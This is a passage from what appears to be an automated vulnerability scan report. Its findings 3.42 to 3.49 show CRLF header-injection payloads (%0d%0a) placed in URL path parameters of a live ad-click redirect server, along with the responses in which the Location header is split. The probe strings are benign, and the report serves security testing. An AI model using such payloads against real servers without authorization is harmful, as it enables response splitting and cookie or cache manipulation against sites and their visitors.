GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/2b2bd%0d%0ad6cedd4809c/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnFcim5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBh4FmTZcWSQ7hJWm31vxvGWRZa3SsmDNZaVkIf3uNYZdH07L4Zb632iXZb5RMp0VZbrsqxlxyw3ow7oDZd9ZcyDFvZcZdISGupYxFlZdGTecU4IrCZbsI29LLgZb64fS3HpZdNWhR4iVJVPFdYnvjeG2iEJWKucrZb0ukZaVMI4M8GnDhZcLjB62RKcsZcYlCGYq7r2n2E9PAK2B2cAuH5TisoBYDXXdwsveeXFZdTUQSh0pKlUfsTtDhc1AD8HslNHTc2Wp4AC76IweAyWhdU4WwxQsXfq8r0ccNZatni0MOVxpVcWDaCCqL7qmnSu7YYaY3cpZanhZacfaXqwl2VhmD2ZbMSVxLLBuZdFTgfK98Zay4Kk1CFEZaNbXNwrZbNqZdNAS30LbGEPp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:30 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/2b2bd
d6cedd4809c
/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.42. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 17 is copied into the Location response header. The payload 99dde%0d%0a3eec990608a was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/99dde%0d%0a3eec990608a/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:49 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/99dde
3eec990608a
/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.43. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 18 is copied into the Location response header. The payload 10f5a%0d%0a7f475f239a3 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/10f5a%0d%0a7f475f239a3/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:45:05 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/10f5a
7f475f239a3
/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.44. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 19 is copied into the Location response header. The payload 6077c%0d%0a81e460d100 was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/6077c%0d%0a81e460d100 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:45:26 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/6077c
81e460d100

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.45. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 316e2%0d%0af3f106cb4ed was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/316e2%0d%0af3f106cb4ed/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:48 GMT;
Content-Type: text/html
Location: 316e2
f3f106cb4ed
/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.46. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6ef98%0d%0adf03781253c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/6ef98%0d%0adf03781253c/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:04 GMT;
Content-Type: text/html
Location: http:/6ef98
df03781253c
/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.47. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e29cc%0d%0a7ba6994efad was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/e29cc%0d%0a7ba6994efad/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a8nFkjw5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavel4nj0NZdQpBN0XRPtxYyospZbkUoQtPZah3Zbuv5uZalknSKBDSuKcXjy4Mhg04I2VhtZbvwf5rRNe6CK9Zbqj8cXhoNRYsZcZaSZaTymZaZa4fUZdn55fgPhUZafvNIb5EHiS3pZd0xrDZbl5qeTx9K9OkjVMMJTSZb9PCmlWrjthZcvkj8ParRPNrujINEMpZb0GJfK39cngwefpnUZdLMBx9mPIv8BIKlMRZc4lP3wqAj5mC1ViP7YotUKZbTqRusc9VtnDc0LWvdj5TfwNauODJ0oSxacS8pwZa9gcPPVJCDWoPGfMQHrCpS1nUK0mCPl6S8OS9nbje3VXK2doscOswpBU2j3HBmIBFMHVwFWZcjYk2Ey7iuYKY7Yq95yx27ul2Cap; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:29 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/e29cc
7ba6994efad
/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.48. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 3a728%0d%0a6b904cbb811 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/3a728%0d%0a6b904cbb811/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:31 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/3a728
6b904cbb811
/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.49. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 7265f%0d%0a8acca6d500f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/7265f%0d%0a8acca6d500f/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:59 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/7265f
8acca6d500f
/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

